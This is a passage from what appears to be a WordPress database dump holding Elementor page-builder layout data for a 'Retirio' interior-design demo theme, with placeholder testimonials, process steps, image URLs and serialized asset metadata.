solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3320,4779,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3321,4779,'_elementor_pro_version','3.8.1'),(3322,4779,'_elementor_css','a:6:{s:4:\"time\";i:1685011836;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3324,4780,'_wp_page_template','elementor_header_footer'),(3325,4780,'_elementor_edit_mode','builder'),(3326,4780,'_elementor_template_type','wp-page'),(3327,4780,'_elementor_version','3.8.1'),(3328,4780,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\